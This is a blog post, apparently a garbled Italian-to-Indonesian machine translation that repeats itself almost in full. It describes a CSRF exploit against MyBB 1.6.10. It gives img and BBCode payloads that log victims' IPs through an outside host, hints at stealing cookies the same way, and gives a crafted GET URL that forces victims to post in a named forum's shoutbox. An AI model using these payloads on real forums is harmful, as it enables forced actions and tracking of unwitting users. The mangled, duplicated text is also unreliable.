Exploit (?) Mungkin.
Pagi Tadi Nadya and teman Nadya tidak tahu apa yang harus dilakukan, jadi s4ya mengatakan:
"Mengapa tidak membuat lelucon dari saya dalam gerhana dan Gi0ve?"
(Saya dengan rendah hati meminta maaf) Jadi saya mencoba untuk menjelajah beberapa kerentanan XSS dan CSRF.Questa adalah Pemalsuan Permintaan Cross Site (CSRF), yaitu, untuk membuat korban permintaan ke halaman tertentu atau situs intenzionalmente.Come tidak bekerja?
Dalam hal ini saya menggunakan lapangan
<Img src = "">
Banyak CMS dan Web situs benar-benar tidak mengontrol isi dari src.
Jika MyBB, Anda tidak dapat menyuntikkan javascript atau vbscript
(Es)
<Img src = "javascript: alert (/ XSS /)" />
dan sehingga Anda tidak dapat membuat XSS, namun diperbolehkan untuk melakukan permintaan GET ke CMS atau server eksternal.
Saya mulai menguji CSRF hanya dengan
<Img src = "http://thezero.it/ips.php" />
Dan poof! inilah IP yang menampilkan gambar: http://thezero.it/ips.txt
Dan selain ip logging bisa banyak hal lain (yang mengatakan Biskuit? [Cookie?]).
Tapi kembali ke 'CRF.
Aku tidak ingin melakukan banyak kekacauan jadi saya pikir untuk menulis pesan di ShoutBox.
Saya mencoba untuk menulis pesan di ShoutBox dan saya melihat jenis permintaan ke server
Dua permintaan pada http://forum.frozenbox.org/xmlhttp.php
Sebuah POST dengan parameter pesan shout_data
GET dengan tindakan query = add_shout
Untuk GET tidak ada masalah, hanya parameterisasi URL sebagai berikut
http://forum.frozenbox.org/xmlhttp.php?action=add_shout
Tapi tidak ada tempat untuk POST. (CSRF di quesitone hanya menerima GET parameter)
Jadi, kami mencoba untuk mengubah parameter POST dalam parameter GET.
CATATAN: Bagi mereka yang tahu PHP, jika server ditafsirkan $ _REQUEST tidak peduli jenis permintaan (GET, POST atau COOKIE), maka akan diterima pula.
Mengubah permintaan POST untuk GET link menjadi:
http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=
Dimana setelah tanda sama akan memasukkan pesan untuk menulis di ShoutBox.
misalnya:
<Img src = "http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=Messaggio" />
CATATAN: Eksploitasi Hanya bekerja melalui MP, di pos diskusi tidak ditafsirkan HTML, (?)
Tetapi dengan beberapa perubahan yang kami dapat menggunakan ini:
(BB Code, bermain hampir di mana saja di forum.)
[Img] http://thezero.it/ips.php [/ img]
Berikut adalah cara untuk menampilkan gambar korban:
[Gambar: ips.php]
HARAP, JANGAN pisau pada IT.
- (?) TheZeroExploit CSRF MyBB 1.6.10
Exploit (?) Mungkin.
Pagi ini saya tidak tahu apa yang harus dilakukan, jadi saya mengatakan:
"Mengapa tidak membuat lelucon dari saya dalam gerhana dan Gi0ve?"
(Saya dengan rendah hati meminta maaf) Jadi saya mencoba untuk menjelajah beberapa kerentanan XSS dan CSRF.Questa adalah Pemalsuan Permintaan Cross Site (CSRF), yaitu, untuk membuat korban permintaan ke halaman tertentu atau situs intenzionalmente.Come tidak bekerja?
Dalam hal ini saya menggunakan lapangan
<Img src = "">
Banyak CMS dan Web situs benar-benar tidak mengontrol isi dari src.
Jika MyBB, Anda tidak dapat menyuntikkan javascript atau vbscript
(Es)
<Img src = "javascript: alert (/ XSS /)" />
dan sehingga Anda tidak dapat membuat XSS, namun diperbolehkan untuk melakukan permintaan GET ke CMS atau server eksternal.
Saya mulai menguji CSRF hanya dengan
<Img src = "http://thezero.it/ips.php" />
Dan poof! inilah IP yang menampilkan gambar: http://thezero.it/ips.txt
Dan selain ip logging bisa banyak hal lain (yang mengatakan Biskuit? [Cookie?]).
Tapi kembali ke 'CRF.
Aku tidak ingin melakukan banyak kekacauan jadi saya pikir untuk menulis pesan di ShoutBox.
Saya mencoba untuk menulis pesan di ShoutBox dan saya melihat jenis permintaan ke server
Dua permintaan pada http://forum.frozenbox.org/xmlhttp.php
Sebuah POST dengan parameter pesan shout_data
GET dengan tindakan query = add_shout
Untuk GET tidak ada masalah, hanya parameterisasi URL sebagai berikut
http://forum.frozenbox.org/xmlhttp.php?action=add_shout
Tapi tidak ada tempat untuk POST. (CSRF di quesitone hanya menerima GET parameter)
Jadi, kami mencoba untuk mengubah parameter POST dalam parameter GET.
CATATAN: Bagi mereka yang tahu PHP, jika server ditafsirkan $ _REQUEST tidak peduli jenis permintaan (GET, POST atau COOKIE), maka akan diterima pula.
Mengubah permintaan POST untuk GET link menjadi:
http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=
Dimana setelah tanda sama akan memasukkan pesan untuk menulis di ShoutBox.
misalnya:
<Img src = "http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=Messaggio" />
CATATAN: Eksploitasi Hanya bekerja melalui MP, di pos diskusi tidak ditafsirkan HTML, (?)
Tetapi dengan beberapa perubahan yang kami dapat menggunakan ini:
(BB Code, bermain hampir di mana saja di forum.)
[Img] http://thezero.it/ips.php [/ img]
Berikut adalah cara untuk menampilkan gambar korban:
[Gambar: ips.php]
HARAP, JANGAN Jadikan pisau pada IT.
- TheZero_Sniper-
Posting Komentar
Peraturan Berkomentar :
✔ Berkomentarlah Sesuai Artikel Diatas
✔ Untuk Berkomentar Gunakan (OpenID / Name URL / Google+)
✔ Berkomentarlah Menggunakan Bahasa Yang Jelas
✔ Relevan
✔ Sopan
✖ SPAM
✖ Link Aktif (Live Link)
✖ Promosi (Iklan)
✖ OOT (Out Of Topic)